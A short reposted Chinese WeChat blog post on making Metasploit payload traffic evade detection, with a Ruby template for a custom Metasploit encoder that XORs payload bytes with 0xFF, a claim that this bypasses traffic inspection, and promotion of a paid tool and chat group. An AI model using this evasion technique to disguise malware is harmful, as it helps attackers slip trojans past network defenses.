0x00 免责声明
!
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。
0x01 Dump免杀效果
!
0x02 调试过程
!
没有进行加密前拿到的反射dll文件
加密后拿到的反射dll文件
0x03 加密脚本编写模板
!
module Msf
module Payload
module Encoder
class MyCustomEncoder < Msf::Encoder
# 设定编码器的名称
def initialize
super()
@name = "name"
end
# 实现编码逻辑
def encode(payload)
# 返回编码后的 payload
encoded_payload = payload.map { |b| (b ^ 0xFF) }.pack("C*")
return encoded_payload
end
# 其他方法...
end
end
end
end
0x04 总结
!
msf免杀对于流量这一块很多都只是加一个证书啥的,但终究传输过程中都能抓到木马原样本,通过本次测试发现不管是使用msf本身的编码还是自己实现编码都可以成功绕过流量检测,虽然还没有进行实战但由多年经验能知道流量这块绕过后对于不管是shellcode免杀还是什么都很好过的。思路大概就这样自己研究吧!!!(我没安装wireshark所以直接dump内存,你们可以直接使用工具)
!
后期会会出一个工具发布到纷传圈子,师傅们要进的抓紧哦!后续价格只增不减,错过机会难再遇哦!
!
添加微信进群:
原文始发于微信公众号(网安鲲为帝):【免杀】MSF流量免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论